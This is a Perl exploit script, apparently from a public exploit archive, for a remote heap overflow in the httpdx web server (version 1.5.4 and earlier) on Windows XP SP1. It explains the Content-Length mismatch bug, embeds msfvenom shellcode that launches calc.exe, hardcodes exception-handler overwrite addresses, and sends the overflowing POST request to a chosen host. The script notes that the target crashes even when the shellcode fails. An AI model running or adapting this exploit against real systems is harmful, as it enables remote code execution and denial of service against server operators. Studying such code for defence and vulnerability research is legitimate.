
# Title : httpdx <= 1.5.4 Remote Heap Overflow
# Published : 2012-07-29
# Author :


#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow 
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
#   where 'size' is the value of the "Content-Length" HTTP header.
#   The POST data is then copied into that buffer with strncpy(x,y,size2),
#   where 'size2' = "request length" - "header length", i.e. the number of
#   body bytes actually received, NOT Content-Length.  A body longer than
#   the declared Content-Length therefore overflows the heap buffer.
#
# - Because httpdx installs its own exception handler for crashes, this
#   exploit overwrites the first _VECTORED_EXCEPTION_NODE structure with a
#   pointer to the shellcode, so the handler that runs on the crash is ours.
#
# - The exploit succeeds most of the time but not always.  In either case
#   httpdx crashes afterwards, so expect a denial of service on the target
#   even when the shellcode does not run.
#
# - WinXP SP1
#   0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================
use strict;
use IO::Socket::INET;


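# Target host and page.  Both may be overridden on the command line
# (`perl exploit.pl <host> <page>`); the defaults match the original script.
my $host = @ARGV ? $ARGV[0] : "127.0.0.1";
my $port = 80;

# The [perl|php|py|..] page to call during the POST request.
# The page must exist and its extension must be listed in the
# "http.handlers = {...}" directive of httpdx.conf.
my $page = @ARGV > 1 ? $ARGV[1] : "/test.pl";


# Windows XP - SP1 - English
# ---------------------------
# Both values below are specific to this build/locale and to httpdx's heap
# layout at the time the request is processed; adjust for any other target.
#
# ptr to the first _VECTORED_EXCEPTION_NODE structure  = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c;

# pointer to our shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;


# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
"\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95" .
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e" .
"\x65\x78\x65\x00";


# Body layout.  The declared Content-Length (1023) makes httpdx allocate
# 1024 bytes, while the body actually sent is $padded_len + 8 bytes; the
# excess past the buffer is what lands on the VEH node / shellcode pointer.
my $content_length = 1023;
my $padded_len     = 1032;

# A payload longer than the padding would silently break the layout
# ("\x90" x negative is the empty string), so refuse it up front.
die "shellcode (" . length($shellcode) . " bytes) exceeds the $padded_len-byte padding\n"
    if length($shellcode) > $padded_len;

my $body = $shellcode
         . ("\x90" x ($padded_len - length $shellcode))   # NOP sled up to the overflow point
         . pack('V', $veh_node_addr)                      # VEH node address
         . pack('V', $sc_ptr);                            # pointer to our shellcode

my $request = "POST $page HTTP/1.0\r\n"
            . "Content-Length: $content_length\r\n"
            . "Content-Type: text\r\n"
            . "Host: $host\r\n"
            . "\r\n"
            . $body;


# flush after every write
$| = 1;

# Fail with a readable message instead of dereferencing an undefined handle
# when the target is unreachable.
my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => 'tcp',
) or die "connect to $host:$port failed: $@\n";

print {$sock} $request or die "send to $host:$port failed: $!\n";

# Echo whatever the server answers, if anything; httpdx is expected to
# crash, so this usually ends with the connection being closed or reset.
while (my $line = <$sock>) {
    print $line;
}
close $sock;
exit;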